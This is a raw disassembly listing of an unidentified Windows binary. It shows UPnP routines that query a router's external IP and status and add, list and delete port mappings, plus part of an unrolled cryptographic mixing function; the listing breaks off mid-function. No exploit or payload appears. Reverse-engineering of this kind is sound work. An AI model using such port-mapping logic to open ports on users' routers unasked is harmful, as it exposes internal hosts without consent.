lea eax, [ebp+var_C]
push eax ; int
lea eax, [ebp+var_1054]
push eax ; int
push ebx ; int
push offset aGetstatusinfo ; "GetStatusInfo"
push [ebp+arg_4] ; int
push [ebp+Str] ; Str
push 0FFFFFFFFh ; s
call sub_9B5E93
lea eax, [ebp+var_54]
push eax
push [ebp+var_C]
lea eax, [ebp+var_1054]
push eax
call sub_9B63B6
lea eax, [ebp+var_54]
push offset aNewuptime ; "NewUptime"
push eax ; int
call sub_9B641C
mov [ebp+Src], eax
lea eax, [ebp+var_54]
push offset aNewconnections ; "NewConnectionStatus"
push eax ; int
call sub_9B641C
mov [ebp+Source], eax
lea eax, [ebp+var_54]
push offset aNewlastconnect ; "NewLastConnectionError"
push eax ; int
call sub_9B641C
add esp, 40h
cmp [ebp+Source], ebx
mov [ebp+var_10], eax
jz short loc_9B64F1
cmp [ebp+Src], ebx
jz short loc_9B64F1
mov [ebp+var_4], ebx
loc_9B64F1: ; CODE XREF: sub_9B644D+9A�j
; sub_9B644D+9F�j
cmp esi, ebx
push edi
mov edi, strncpy
jz short loc_9B6513
cmp [ebp+Source], ebx
jz short loc_9B6511
push 40h ; Count
push [ebp+Source] ; Source
push esi ; Dest
call edi ; strncpy
add esp, 0Ch
mov [esi+3Fh], bl
jmp short loc_9B6513
; ---------------------------------------------------------------------------
loc_9B6511: ; CODE XREF: sub_9B644D+B2�j
mov [esi], bl
loc_9B6513: ; CODE XREF: sub_9B644D+AD�j
; sub_9B644D+C2�j
cmp [ebp+arg_C], ebx
jz short loc_9B6531
cmp [ebp+Src], ebx
jz short loc_9B6531
push [ebp+arg_C]
push offset aU ; "%u"
push [ebp+Src] ; Src
call sscanf
add esp, 0Ch
loc_9B6531: ; CODE XREF: sub_9B644D+C9�j
; sub_9B644D+CE�j
mov esi, [ebp+Dest]
cmp esi, ebx
jz short loc_9B654F
cmp [ebp+var_10], ebx
jz short loc_9B654D
push 40h ; Count
push [ebp+var_10] ; Source
push esi ; Dest
call edi ; strncpy
add esp, 0Ch
mov [esi+3Fh], bl
jmp short loc_9B654F
; ---------------------------------------------------------------------------
loc_9B654D: ; CODE XREF: sub_9B644D+EE�j
mov [esi], bl
loc_9B654F: ; CODE XREF: sub_9B644D+E9�j
; sub_9B644D+FE�j
lea eax, [ebp+var_54]
push offset aErrorcode ; "errorCode"
push eax ; int
call sub_9B641C
cmp eax, ebx
pop ecx
pop ecx
pop edi
jz short loc_9B657B
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset aD ; "%d"
push eax ; Src
call sscanf
add esp, 0Ch
loc_9B657B: ; CODE XREF: sub_9B644D+115�j
lea eax, [ebp+var_54]
push eax
call sub_9B63F2
mov eax, [ebp+var_4]
pop ecx
loc_9B6588: ; CODE XREF: sub_9B644D+2B�j
pop esi
pop ebx
leave
retn
sub_9B644D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B658C(char *Str,int,char *Dest)
sub_9B658C proc near ; CODE XREF: sub_9AA27B+5F�p
var_104C = dword ptr -104Ch
var_4C = dword ptr -4Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
Dest = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 104Ch
call __alloca_probe
or [ebp+var_4], 0FFFFFFFFh
push ebx
push esi
mov esi, [ebp+Dest]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_8], 1000h
jz loc_9B665C
cmp [ebp+Str], ebx
jz loc_9B665C
cmp [ebp+arg_4], ebx
jz loc_9B665C
lea eax, [ebp+var_8]
push eax ; int
lea eax, [ebp+var_104C]
push eax ; int
push ebx ; int
push offset aGetexternalipa ; "GetExternalIPAddress"
push [ebp+arg_4] ; int
push [ebp+Str] ; Str
push 0FFFFFFFFh ; s
call sub_9B5E93
lea eax, [ebp+var_4C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_104C]
push eax
call sub_9B63B6
lea eax, [ebp+var_4C]
push offset aNewexternalipa ; "NewExternalIPAddress"
push eax ; int
call sub_9B641C
add esp, 30h
cmp eax, ebx
jz short loc_9B6620
push 10h ; Count
push eax ; Source
push esi ; Dest
call strncpy
add esp, 0Ch
mov [esi+0Fh], bl
mov [ebp+var_4], ebx
jmp short loc_9B6622
; ---------------------------------------------------------------------------
loc_9B6620: ; CODE XREF: sub_9B658C+7D�j
mov [esi], bl
loc_9B6622: ; CODE XREF: sub_9B658C+92�j
lea eax, [ebp+var_4C]
push offset aErrorcode ; "errorCode"
push eax ; int
call sub_9B641C
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B664D
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset aD ; "%d"
push eax ; Src
call sscanf
add esp, 0Ch
loc_9B664D: ; CODE XREF: sub_9B658C+A8�j
lea eax, [ebp+var_4C]
push eax
call sub_9B63F2
mov eax, [ebp+var_4]
pop ecx
jmp short loc_9B665F
; ---------------------------------------------------------------------------
loc_9B665C: ; CODE XREF: sub_9B658C+21�j
; sub_9B658C+2A�j ...
push 0FFFFFFFEh
pop eax
loc_9B665F: ; CODE XREF: sub_9B658C+CE�j
pop esi
pop ebx
leave
retn
sub_9B658C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B6663(char *Str,int,int,int,int,int,int)
sub_9B6663 proc near ; CODE XREF: sub_9AA320+CF�p
var_104C = dword ptr -104Ch
var_4C = dword ptr -4Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 104Ch
call __alloca_probe
cmp [ebp+arg_C], 0
push ebx
push edi
mov [ebp+var_8], 1000h
jz loc_9B6793
cmp [ebp+arg_10], 0
jz loc_9B6793
mov ebx, [ebp+arg_18]
test ebx, ebx
jz loc_9B6793
mov edi, [ebp+arg_8]
test edi, edi
jz loc_9B6793
push esi
push 8 ; SizeOfElements
push 9 ; NumOfElements
call calloc
mov esi, eax
mov eax, [ebp+arg_C]
mov [esi+1Ch], eax
mov eax, [ebp+arg_10]
mov [esi+24h], eax
mov eax, [ebp+arg_14]
test eax, eax
pop ecx
pop ecx
mov dword ptr [esi], offset aNewremotehost ; "NewRemoteHost"
mov dword ptr [esi+8], offset aNewexternalpor ; "NewExternalPort"
mov [esi+0Ch], edi
mov dword ptr [esi+10h], offset aNewprotocol ; "NewProtocol"
mov [esi+14h], ebx
mov dword ptr [esi+18h], offset aNewinternalpor ; "NewInternalPort"
mov dword ptr [esi+20h], offset aNewinternalcli ; "NewInternalClient"
mov dword ptr [esi+28h], offset aNewenabled ; "NewEnabled"
mov dword ptr [esi+2Ch], offset a1 ; "1"
mov dword ptr [esi+30h], offset aNewportmapping ; "NewPortMappingDescription"
jnz short loc_9B6707
mov eax, offset WindowName ; "recv"
loc_9B6707: ; CODE XREF: sub_9B6663+9D�j
mov [esi+34h], eax
lea eax, [ebp+var_8]
push eax ; int
lea eax, [ebp+var_104C]
push eax ; int
push esi ; int
push offset aAddportmapping ; "AddPortMapping"
push [ebp+arg_4] ; int
mov dword ptr [esi+38h], offset aNewleasedurati ; "NewLeaseDuration"
push [ebp+Str] ; Str
mov dword ptr [esi+3Ch], offset PrefixString ; "ror"
push 0FFFFFFFFh ; s
call sub_9B5E93
lea eax, [ebp+var_4C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_104C]
push eax
call sub_9B63B6
lea eax, [ebp+var_4C]
push offset aErrorcode ; "errorCode"
push eax ; int
call sub_9B641C
add esp, 30h
test eax, eax
jz short loc_9B6777
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset aD ; "%d"
push eax ; Src
call sscanf
add esp, 0Ch
jmp short loc_9B677B
; ---------------------------------------------------------------------------
loc_9B6777: ; CODE XREF: sub_9B6663+F9�j
and [ebp+var_4], 0
loc_9B677B: ; CODE XREF: sub_9B6663+112�j
lea eax, [ebp+var_4C]
push eax
call sub_9B63F2
push esi ; Memory
call free
mov eax, [ebp+var_4]
pop ecx
pop ecx
pop esi
jmp short loc_9B6796
; ---------------------------------------------------------------------------
loc_9B6793: ; CODE XREF: sub_9B6663+1A�j
; sub_9B6663+24�j ...
push 0FFFFFFFEh
pop eax
loc_9B6796: ; CODE XREF: sub_9B6663+12E�j
pop edi
pop ebx
leave
retn
sub_9B6663 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B679A(char *Str,int,int,int)
sub_9B679A proc near ; CODE XREF: sub_9AA18B+C6�p
var_1048 = dword ptr -1048h
var_48 = dword ptr -48h
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 1048h
call __alloca_probe
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
push edi
mov [ebp+var_4], 1000h
jz loc_9B6868
mov edi, [ebp+arg_C]
test edi, edi
jz loc_9B6868
push esi
push 8 ; SizeOfElements
push 4 ; NumOfElements
call calloc
mov esi, eax
lea eax, [ebp+var_4]
push eax ; int
lea eax, [ebp+var_1048]
push eax ; int
push esi ; int
push offset aDeleteportmapp ; "DeletePortMapping"
push [ebp+arg_4] ; int
mov dword ptr [esi], offset aNewremotehost ; "NewRemoteHost"
push [ebp+Str] ; Str
mov dword ptr [esi+8], offset aNewexternalpor ; "NewExternalPort"
push 0FFFFFFFFh ; s
mov [esi+0Ch], ebx
mov dword ptr [esi+10h], offset aNewprotocol ; "NewProtocol"
mov [esi+14h], edi
call sub_9B5E93
lea eax, [ebp+var_48]
push eax
push [ebp+var_4]
lea eax, [ebp+var_1048]
push eax
call sub_9B63B6
lea eax, [ebp+var_48]
push offset aErrorcode ; "errorCode"
push eax ; int
call sub_9B641C
add esp, 38h
test eax, eax
jz short loc_9B684C
or [ebp+arg_8], 0FFFFFFFFh
lea ecx, [ebp+arg_8]
push ecx
push offset aD ; "%d"
push eax ; Src
call sscanf
add esp, 0Ch
jmp short loc_9B6850
; ---------------------------------------------------------------------------
loc_9B684C: ; CODE XREF: sub_9B679A+97�j
and [ebp+arg_8], 0
loc_9B6850: ; CODE XREF: sub_9B679A+B0�j
lea eax, [ebp+var_48]
push eax
call sub_9B63F2
push esi ; Memory
call free
mov eax, [ebp+arg_8]
pop ecx
pop ecx
pop esi
jmp short loc_9B686B
; ---------------------------------------------------------------------------
loc_9B6868: ; CODE XREF: sub_9B679A+1B�j
; sub_9B679A+26�j
push 0FFFFFFFEh
pop eax
loc_9B686B: ; CODE XREF: sub_9B679A+CC�j
pop edi
pop ebx
leave
retn
sub_9B679A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B686F(char *Str,int,void *Memory,int,int,int,int,int,int,char *Dest,int)
sub_9B686F proc near ; CODE XREF: sub_9AA18B+81�p
var_104C = dword ptr -104Ch
var_4C = dword ptr -4Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
Memory = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
Dest = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 104Ch
call __alloca_probe
or [ebp+var_4], 0FFFFFFFFh
push ebx
push esi
mov esi, [ebp+Memory]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_8], 1000h
jnz short loc_9B689A
push 0FFFFFFFEh
pop eax
jmp loc_9B6A6C
; ---------------------------------------------------------------------------
loc_9B689A: ; CODE XREF: sub_9B686F+21�j
mov eax, [ebp+arg_10]
push edi
mov [eax], bl
mov eax, [ebp+arg_14]
push 8 ; SizeOfElements
push 2 ; NumOfElements
mov [eax], bl
call calloc
lea ecx, [ebp+var_8]
push ecx ; int
lea ecx, [ebp+var_104C]
push ecx ; int
push eax ; int
push offset aGetgenericport ; "GetGenericPortMappingEntry"
push [ebp+arg_4] ; int
mov [ebp+Memory], eax
push [ebp+Str] ; Str
mov dword ptr [eax], offset aNewportmappi_0 ; "NewPortMappingIndex"
push 0FFFFFFFFh ; s
mov [eax+4], esi
call sub_9B5E93
lea eax, [ebp+var_4C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_104C]
push eax
call sub_9B63B6
lea eax, [ebp+var_4C]
push offset aNewremotehost ; "NewRemoteHost"
push eax ; int
call sub_9B641C
mov esi, strncpy
add esp, 38h
cmp eax, ebx
jz short loc_9B691A
mov edi, [ebp+Dest]
cmp edi, ebx
jz short loc_9B691A
push 40h ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+3Fh], bl
loc_9B691A: ; CODE XREF: sub_9B686F+96�j
; sub_9B686F+9D�j
lea eax, [ebp+var_4C]
push offset aNewexternalpor ; "NewExternalPort"
push eax ; int
call sub_9B641C
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B6944
mov edi, [ebp+arg_C]
cmp edi, ebx
jz short loc_9B6944
push 6 ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+5], bl
mov [ebp+var_4], ebx
loc_9B6944: ; CODE XREF: sub_9B686F+BD�j
; sub_9B686F+C4�j
lea eax, [ebp+var_4C]
push offset aNewprotocol ; "NewProtocol"
push eax ; int
call sub_9B641C
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B696B
mov edi, [ebp+arg_18]
cmp edi, ebx
jz short loc_9B696B
push 4 ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+3], bl
loc_9B696B: ; CODE XREF: sub_9B686F+E7�j
; sub_9B686F+EE�j
lea eax, [ebp+var_4C]
push offset aNewinternalcli ; "NewInternalClient"
push eax ; int
call sub_9B641C
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B6991
mov edi, [ebp+arg_10]
push 10h ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+0Fh], bl
mov [ebp+var_4], ebx
loc_9B6991: ; CODE XREF: sub_9B686F+10E�j
lea eax, [ebp+var_4C]
push offset aNewinternalpor ; "NewInternalPort"
push eax ; int
call sub_9B641C
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B69B4
mov edi, [ebp+arg_14]
push 6 ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+5], bl
loc_9B69B4: ; CODE XREF: sub_9B686F+134�j
lea eax, [ebp+var_4C]
push offset aNewenabled ; "NewEnabled"
push eax ; int
call sub_9B641C
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B69DB
mov edi, [ebp+arg_20]
cmp edi, ebx
jz short loc_9B69DB
push 4 ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+3], bl
loc_9B69DB: ; CODE XREF: sub_9B686F+157�j
; sub_9B686F+15E�j
lea eax, [ebp+var_4C]
push offset aNewportmapping ; "NewPortMappingDescription"
push eax ; int
call sub_9B641C
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B6A02
mov edi, [ebp+arg_1C]
cmp edi, ebx
jz short loc_9B6A02
push 50h ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+4Fh], bl
loc_9B6A02: ; CODE XREF: sub_9B686F+17E�j
; sub_9B686F+185�j
lea eax, [ebp+var_4C]
push offset aNewleasedurati ; "NewLeaseDuration"
push eax ; int
call sub_9B641C
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B6A29
mov edi, [ebp+arg_28]
cmp edi, ebx
jz short loc_9B6A29
push 10h ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+0Fh], bl
loc_9B6A29: ; CODE XREF: sub_9B686F+1A5�j
; sub_9B686F+1AC�j
lea eax, [ebp+var_4C]
push offset aErrorcode ; "errorCode"
push eax ; int
call sub_9B641C
cmp eax, ebx
pop ecx
pop ecx
pop edi
jz short loc_9B6A55
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset aD ; "%d"
push eax ; Src
call sscanf
add esp, 0Ch
loc_9B6A55: ; CODE XREF: sub_9B686F+1CD�j
lea eax, [ebp+var_4C]
push eax
call sub_9B63F2
push [ebp+Memory] ; Memory
call free
mov eax, [ebp+var_4]
pop ecx
pop ecx
loc_9B6A6C: ; CODE XREF: sub_9B686F+26�j
pop esi
pop ebx
leave
retn
sub_9B686F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B6A70(char *Str,int,int,int,char *Dest,int)
sub_9B6A70 proc near ; CODE XREF: sub_9AA320+F8�p
var_104C = dword ptr -104Ch
var_4C = dword ptr -4Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Dest = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 104Ch
call __alloca_probe
or [ebp+var_4], 0FFFFFFFFh
cmp [ebp+arg_14], 0
push ebx
push edi
mov [ebp+var_8], 1000h
jz loc_9B6BB2
cmp [ebp+Dest], 0
jz loc_9B6BB2
mov ebx, [ebp+arg_8]
test ebx, ebx
jz loc_9B6BB2
mov edi, [ebp+arg_C]
test edi, edi
jz loc_9B6BB2
push esi
push 8 ; SizeOfElements
push 4 ; NumOfElements
call calloc
mov esi, eax
lea eax, [ebp+var_8]
push eax ; int
lea eax, [ebp+var_104C]
push eax ; int
push esi ; int
push offset aGetspecificpor ; "GetSpecificPortMappingEntry"
push [ebp+arg_4] ; int
mov dword ptr [esi], offset aNewremotehost ; "NewRemoteHost"
push [ebp+Str] ; Str
mov dword ptr [esi+8], offset aNewexternalpor ; "NewExternalPort"
push 0FFFFFFFFh ; s
mov [esi+0Ch], ebx
mov dword ptr [esi+10h], offset aNewprotocol ; "NewProtocol"
mov [esi+14h], edi
call sub_9B5E93
lea eax, [ebp+var_4C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_104C]
push eax
call sub_9B63B6
lea eax, [ebp+var_4C]
push offset aNewinternalcli ; "NewInternalClient"
push eax ; int
call sub_9B641C
mov edi, strncpy
add esp, 38h
test eax, eax
jz short loc_9B6B3D
mov ebx, [ebp+Dest]
push 10h ; Count
push eax ; Source
push ebx ; Dest
call edi ; strncpy
add esp, 0Ch
and [ebp+var_4], 0
mov byte ptr [ebx+0Fh], 0
jmp short loc_9B6B43
; ---------------------------------------------------------------------------
loc_9B6B3D: ; CODE XREF: sub_9B6A70+B5�j
mov eax, [ebp+Dest]
mov byte ptr [eax], 0
loc_9B6B43: ; CODE XREF: sub_9B6A70+CB�j
lea eax, [ebp+var_4C]
push offset aNewinternalpor ; "NewInternalPort"
push eax ; int
call sub_9B641C
test eax, eax
pop ecx
pop ecx
jz short loc_9B6B69
mov ebx, [ebp+arg_14]
push 6 ; Count
push eax ; Source
push ebx ; Dest
call edi ; strncpy
add esp, 0Ch
mov byte ptr [ebx+5], 0
jmp short loc_9B6B6F
; ---------------------------------------------------------------------------
loc_9B6B69: ; CODE XREF: sub_9B6A70+E5�j
mov eax, [ebp+arg_14]
mov byte ptr [eax], 0
loc_9B6B6F: ; CODE XREF: sub_9B6A70+F7�j
lea eax, [ebp+var_4C]
push offset aErrorcode ; "errorCode"
push eax ; int
call sub_9B641C
test eax, eax
pop ecx
pop ecx
jz short loc_9B6B9A
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset aD ; "%d"
push eax ; Src
call sscanf
add esp, 0Ch
loc_9B6B9A: ; CODE XREF: sub_9B6A70+111�j
lea eax, [ebp+var_4C]
push eax
call sub_9B63F2
push esi ; Memory
call free
mov eax, [ebp+var_4]
pop ecx
pop ecx
pop esi
jmp short loc_9B6BB5
; ---------------------------------------------------------------------------
loc_9B6BB2: ; CODE XREF: sub_9B6A70+1E�j
; sub_9B6A70+28�j ...
push 0FFFFFFFEh
pop eax
loc_9B6BB5: ; CODE XREF: sub_9B6A70+140�j
pop edi
pop ebx
leave
retn
sub_9B6A70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B6BB9(int,int,void *Dst)
sub_9B6BB9 proc near ; CODE XREF: sub_9AF464+3A�p
; sub_9AF464+A7�p
var_3C98 = dword ptr -3C98h
Src = byte ptr -3C90h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Dst = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 3C98h
call __alloca_probe
lea eax, [ebp+var_3C98]
push 200h ; int
push eax ; Dst
call sub_9B789E
mov eax, [ebp+arg_4]
push 8
pop ecx
mul ecx
push edx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_3C98]
push eax
call sub_9B7B7B
lea eax, [ebp+var_3C98]
push 0 ; Dst
push eax ; int
call sub_9B7DEE
push 40h ; Size
lea eax, [ebp+Src]
push eax ; Src
push [ebp+Dst] ; Dst
call memcpy
add esp, 2Ch
leave
retn
sub_9B6BB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B6C14 proc near ; CODE XREF: sub_9B73CC+63�p
var_54 = dword ptr -54h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
mov ecx, [ebp+arg_4]
shl ecx, 4
test ecx, ecx
mov [ebp+var_C], 89ABCDEFh
mov [ebp+var_8], 1234567h
jle locret_9B73CA
mov eax, [ebp+arg_0]
add eax, 1D0h
dec ecx
push ebx
shr ecx, 4
inc ecx
push esi
mov [ebp+var_4], ecx
push edi
loc_9B6C49: ; CODE XREF: sub_9B6C14+7AD�j
mov edi, [eax+50h]
mov ebx, [eax+68h]
mov esi, [eax+54h]
mov edx, [eax-11Ch]
and edx, [eax+4]
and ebx, edi
mov ecx, [eax-120h]
and ecx, [eax]
mov edi, [eax+6Ch]
xor ecx, ebx
xor ecx, [eax-1D0h]
and edi, esi
xor edx, edi
xor edx, [eax-1CCh]
mov esi, [eax+70h]
xor edx, [eax+74h]
xor ecx, esi
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Ah
xor ecx, edi
shr ebx, 0Ah
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 0Bh
xor ebx, edx
mov edx, [eax-114h]
and edx, [eax+0Ch]
shl edi, 0Bh
xor edi, ecx
mov ecx, [eax-118h]
and ecx, [eax+8]
mov [eax+0FCh], ebx
mov ebx, [eax+58h]
and esi, ebx
mov ebx, [eax+74h]
mov [eax+0F8h], edi
mov edi, [eax+5Ch]
and ebx, edi
xor edx, ebx
xor edx, [eax-1C4h]
xor ecx, esi
xor ecx, [eax-1C8h]
mov esi, [eax+7Ch]
xor ecx, [eax+78h]
xor edx, esi
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 5
xor ecx, edi
shr ebx, 5
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 18h
shl edi, 18h
xor edi, ecx
xor ebx, edx
mov edx, [eax-10Ch]
and edx, [eax+14h]
lea ecx, [eax+80h]
mov [ebp+arg_4], ecx
mov ecx, [eax-110h]
and ecx, [eax+10h]
mov [eax+100h], edi
mov edi, [eax+60h]
and edi, [eax+78h]
mov [eax+104h], ebx
mov ebx, [eax+64h]
and ebx, esi
mov esi, [ebp+arg_4]
xor ecx, edi
xor ecx, [eax-1C0h]
mov edi, [esi]
xor edx, ebx
xor edx, [eax-1BCh]
mov esi, [esi+4]
xor ecx, edi
xor ecx, [ebp+var_C]
xor edx, esi
xor edx, [ebp+var_8]
mov [ebp+var_30], esi
mov esi, ecx
mov ebx, edx
shrd esi, ebx, 0Dh
xor ecx, esi
shr ebx, 0Dh
xor edx, ebx
mov esi, ecx
mov ebx, edx
shld ebx, esi, 9
xor ebx, edx
mov edx, [eax-104h]
and edx, [eax+1Ch]
shl esi, 9
xor esi, ecx
mov ecx, [eax-108h]
and ecx, [eax+18h]
mov [eax+108h], esi
mov esi, [eax+68h]
and esi, edi
mov edi, [eax+6Ch]
and edi, [ebp+var_30]
xor ecx, esi
xor ecx, [eax-1B8h]
mov esi, [eax+88h]
xor edx, edi
xor edx, [eax-1B4h]
xor ecx, esi
xor edx, [eax+8Ch]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov [eax+10Ch], ebx
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Ah
xor ecx, edi
shr ebx, 0Ah
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 10h
shl edi, 10h
xor edi, ecx
mov ecx, [eax-100h]
and ecx, [eax+20h]
xor ebx, edx
mov edx, [eax-0FCh]
and edx, [eax+24h]
mov [eax+110h], edi
mov edi, [eax+70h]
and edi, esi
mov esi, [eax+74h]
and esi, [eax+8Ch]
xor ecx, edi
xor ecx, [eax-1B0h]
xor edx, esi
xor edx, [eax-1ACh]
mov esi, [eax+90h]
xor edx, [eax+94h]
xor ecx, esi
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov [eax+114h], ebx
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Bh
shr ebx, 0Bh
xor ecx, edi
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 0Fh
shl edi, 0Fh
xor edi, ecx
xor ebx, edx
mov [eax+118h], edi
mov edx, [eax-0F4h]
and edx, [eax+2Ch]
mov edi, [eax+94h]
and edi, [eax+7Ch]
mov ecx, [eax-0F8h]
and ecx, [eax+28h]
and esi, [eax+78h]
xor edx, edi
xor edx, [eax-1A4h]
xor ecx, esi
xor ecx, [eax-1A8h]
xor edx, [eax+9Ch]
mov esi, [eax+98h]
xor edx, [ebp+var_8]
xor ecx, esi
xor ecx, [ebp+var_C]
mov [eax+11Ch], ebx
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Ch
xor ecx, edi
shr ebx, 0Ch
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 9
xor ebx, edx
mov edx, [eax-0ECh]
and edx, [eax+34h]
shl edi, 9
xor edi, ecx
mov ecx, [eax-0F0h]
and ecx, [eax+30h]
mov [eax+124h], ebx
mov ebx, [ebp+arg_4]
mov [eax+120h], edi
mov edi, esi
and edi, [ebx]
mov ebx, [eax+9Ch]
and ebx, [ebp+var_30]
xor ecx, edi
xor ecx, [eax-1A0h]
xor edx, ebx
xor edx, [eax-19Ch]
xor ecx, [eax+0A0h]
xor edx, [eax+0A4h]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 2
xor ecx, edi
shr ebx, 2
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 1Bh
xor ebx, edx
mov edx, [eax-0E4h]
and edx, [eax+3Ch]
shl edi, 1Bh
xor edi, ecx
mov ecx, [eax-0E8h]
and ecx, [eax+38h]
mov [eax+128h], edi
mov edi, [eax+0A0h]
and edi, [eax+88h]
mov [eax+12Ch], ebx
mov ebx, [eax+0A4h]
and ebx, [eax+8Ch]
xor ecx, edi
xor ecx, [eax-198h]
xor edx, ebx
xor edx, [eax-194h]
xor ecx, [eax+0A8h]
xor edx, [eax+0ACh]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 7
xor ecx, edi
shr ebx, 7
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 0Fh
xor ebx, edx
mov edx, [eax-0DCh]
and edx, [eax+44h]
shl edi, 0Fh
xor edi, ecx
mov ecx, [eax+0B0h]
mov [ebp+var_14], ecx
mov ecx, [eax+0B4h]
mov [ebp+var_10], ecx
mov ecx, [eax-0E0h]
and ecx, [eax+40h]
mov [eax+130h], edi
mov edi, [eax+0A8h]
and edi, [eax+90h]
mov [eax+134h], ebx
mov ebx, [eax+0ACh]
and ebx, [eax+94h]
xor ecx, edi
xor ecx, [eax-190h]
xor edx, ebx
xor edx, [eax-18Ch]
xor ecx, [ebp+var_14]
xor edx, [ebp+var_10]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_8]
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Eh
xor ecx, edi
shr ebx, 0Eh
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 6
shl edi, 6
xor edi, ecx
mov ecx, [eax-0D8h]
and ecx, [eax+48h]
xor ebx, edx
mov edx, [eax-0D4h]
and edx, [eax+4Ch]
mov [eax+138h], edi
mov edi, [ebp+var_14]
and edi, esi
mov esi, [ebp+var_10]
and esi, [eax+9Ch]
xor ecx, edi
xor ecx, [eax-188h]
xor edx, esi
xor edx, [eax-184h]
